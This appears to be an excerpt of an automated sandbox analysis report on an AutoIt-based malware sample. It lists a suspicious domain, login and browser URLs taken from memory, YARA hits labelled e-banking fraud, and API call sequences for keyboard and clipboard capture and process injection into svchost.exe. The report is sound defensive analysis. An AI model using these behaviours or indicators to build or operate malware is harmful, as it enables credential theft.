Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 05:33:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000002.2479760210.0000000000E1B000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.hypend.xyz
Source: BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000002.2479760210.0000000000E1B000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.hypend.xyz/tekh/
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: sfc.exe, 0000000C.00000003.2164208325.0000000003332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sfc.exe, 0000000C.00000003.2164208325.0000000003332000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2478431645.0000000003320000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sfc.exe, 0000000C.00000002.2478431645.0000000003320000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: sfc.exe, 0000000C.00000002.2478431645.0000000003320000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2IWW
Source: sfc.exe, 0000000C.00000003.2164208325.0000000003332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sfc.exe, 0000000C.00000003.2164208325.0000000003332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: sfc.exe, 0000000C.00000003.2164208325.0000000003332000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2478431645.0000000003320000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sfc.exe, 0000000C.00000003.2164208325.0000000003332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sfc.exe, 0000000C.00000002.2478431645.0000000003320000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sfc.exe, 0000000C.00000003.2163218248.000000000812E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: sfc.exe, 0000000C.00000002.2483382696.000000000814E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldph
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_007A4164
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_007A4164
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_007A3F66
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_0079001C
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_007BCABC

E-Banking Fraud

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2477977050.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1977517644.0000000007FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2480569793.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1973374982.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2480573811.0000000002C20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2479760210.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1974135087.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2480693049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: This is a third-party compiled AutoIt script. 0_2_00733B3A
Source: rPO2025KTI-1059.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: rPO2025KTI-1059.exe, 00000000.00000002.1249309933.00000000007E4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f8163610-3
Source: rPO2025KTI-1059.exe, 00000000.00000002.1249309933.00000000007E4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_c8ad4ee9-2
Source: rPO2025KTI-1059.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c49b21e1-6
Source: rPO2025KTI-1059.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_65edfa6d-a
Source: C:\Windows\SysWOW64\svchost.exe Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042CA33 NtClose, 1_2_0042CA33
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72B60 NtClose,LdrInitializeThunk, 1_2_03C72B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk, 1_2_03C72DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk, 1_2_03C735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C74340 NtSetContextThread, 1_2_03C74340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C74650 NtSuspendThread, 1_2_03C74650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72BE0 NtQueryValueKey, 1_2_03C72BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72BF0 NtAllocateVirtualMemory, 1_2_03C72BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72B80 NtQueryInformationFile, 1_2_03C72B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72BA0 NtEnumerateValueKey, 1_2_03C72BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72AD0 NtReadFile, 1_2_03C72AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72AF0 NtWriteFile, 1_2_03C72AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72AB0 NtWaitForSingleObject, 1_2_03C72AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72FE0 NtCreateFile, 1_2_03C72FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72F90 NtProtectVirtualMemory, 1_2_03C72F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72FA0 NtQuerySection, 1_2_03C72FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72FB0 NtResumeThread, 1_2_03C72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72F60 NtCreateProcessEx, 1_2_03C72F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72F30 NtCreateSection, 1_2_03C72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72EE0 NtQueueApcThread, 1_2_03C72EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72E80 NtReadVirtualMemory, 1_2_03C72E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72EA0 NtAdjustPrivilegesToken, 1_2_03C72EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72E30 NtWriteVirtualMemory, 1_2_03C72E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72DD0 NtDelayExecution, 1_2_03C72DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72DB0 NtEnumerateKey, 1_2_03C72DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72D00 NtSetInformationFile, 1_2_03C72D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72D10 NtMapViewOfSection, 1_2_03C72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72D30 NtUnmapViewOfSection, 1_2_03C72D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72CC0 NtQueryVirtualMemory, 1_2_03C72CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72CF0 NtOpenProcess, 1_2_03C72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72CA0 NtQueryInformationToken, 1_2_03C72CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72C60 NtCreateKey, 1_2_03C72C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72C70 NtFreeVirtualMemory, 1_2_03C72C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C72C00 NtQueryInformationProcess, 1_2_03C72C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C73090 NtSetValueKey, 1_2_03C73090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C73010 NtOpenDirectoryObject, 1_2_03C73010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C739B0 NtGetContextThread, 1_2_03C739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C73D70 NtOpenThread, 1_2_03C73D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C73D10 NtOpenProcessToken, 1_2_03C73D10
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_0079A1EF
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00788310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00788310
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_007951BD
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0073E6A0 0_2_0073E6A0
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0075D975 0_2_0075D975
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007521C5 0_2_007521C5
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007662D2 0_2_007662D2
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007B03DA 0_2_007B03DA
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0076242E 0_2_0076242E
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007525FA 0_2_007525FA
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0078E616 0_2_0078E616
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007466E1 0_2_007466E1
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0076878F 0_2_0076878F
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007B0857 0_2_007B0857
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00766844 0_2_00766844
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00748808 0_2_00748808
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00798889 0_2_00798889
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0075CB21 0_2_0075CB21
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00766DB6 0_2_00766DB6
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00746F9E 0_2_00746F9E
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00743030 0_2_00743030
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0075F1D9 0_2_0075F1D9
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00753187 0_2_00753187
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00731287 0_2_00731287
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00751484 0_2_00751484
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00745520 0_2_00745520
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00757696 0_2_00757696
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00745760 0_2_00745760
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00751978 0_2_00751978
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0073FCE0 0_2_0073FCE0
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007B7DDB 0_2_007B7DDB
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0075BDA6 0_2_0075BDA6
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00751D90 0_2_00751D90
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0073DF00 0_2_0073DF00
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00743FE0 0_2_00743FE0
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_01FC3600 0_2_01FC3600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004189B3 1_2_004189B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042F013 1_2_0042F013
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004101C3 1_2_004101C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401220 1_2_00401220
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402230 1_2_00402230
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401B50 1_2_00401B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416B3B 1_2_00416B3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E3D3 1_2_0040E3D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004103E3 1_2_004103E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416BB3 1_2_00416BB3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004024E0 1_2_004024E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E517 1_2_0040E517
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E523 1_2_0040E523
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402DB0 1_2_00402DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4E3F0 1_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D003E6 1_2_03D003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFA352 1_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC02C0 1_2_03CC02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF81CC 1_2_03CF81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF41A2 1_2_03CF41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D001AA 1_2_03D001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC8158 1_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C30100 1_2_03C30100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDA118 1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3C7C0 1_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C64750 1_2_03C64750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40770 1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5C6E0 1_2_03C5C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D00591 1_2_03D00591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40535 1_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEE4F6 1_2_03CEE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF2446 1_2_03CF2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE4420 1_2_03CE4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF6BD7 1_2_03CF6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFAB40 1_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3EA80 1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D0A9A6 1_2_03D0A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C56962 1_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6E8F0 1_2_03C6E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C268B8 1_2_03C268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4A840 1_2_03C4A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C42840 1_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C32FC8 1_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4CFE0 1_2_03C4CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBEFA0 1_2_03CBEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB4F40 1_2_03CB4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C82F28 1_2_03C82F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C60F30 1_2_03C60F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE2F30 1_2_03CE2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFEEDB 1_2_03CFEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C52E90 1_2_03C52E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFCE93 1_2_03CFCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40E59 1_2_03C40E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFEE26 1_2_03CFEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3ADE0 1_2_03C3ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C58DBF 1_2_03C58DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4AD00 1_2_03C4AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDCD1F 1_2_03CDCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C30CF2 1_2_03C30CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0CB5 1_2_03CE0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40C00 1_2_03C40C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C8739A 1_2_03C8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2D34C 1_2_03C2D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF132D 1_2_03CF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5B2C0 1_2_03C5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE12ED 1_2_03CE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C452A0 1_2_03C452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4B1B0 1_2_03C4B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7516C 1_2_03C7516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2F172 1_2_03C2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D0B16B 1_2_03D0B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEF0CC 1_2_03CEF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C470C0 1_2_03C470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF70E9 1_2_03CF70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFF0E0 1_2_03CFF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFF7B0 1_2_03CFF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF16CC 1_2_03CF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C85630 1_2_03C85630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D095C3 1_2_03D095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDD5B0 1_2_03CDD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF7571 1_2_03CF7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C31460 1_2_03C31460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFF43F 1_2_03CFF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB5BF0 1_2_03CB5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7DBF9 1_2_03C7DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5FB80 1_2_03C5FB80
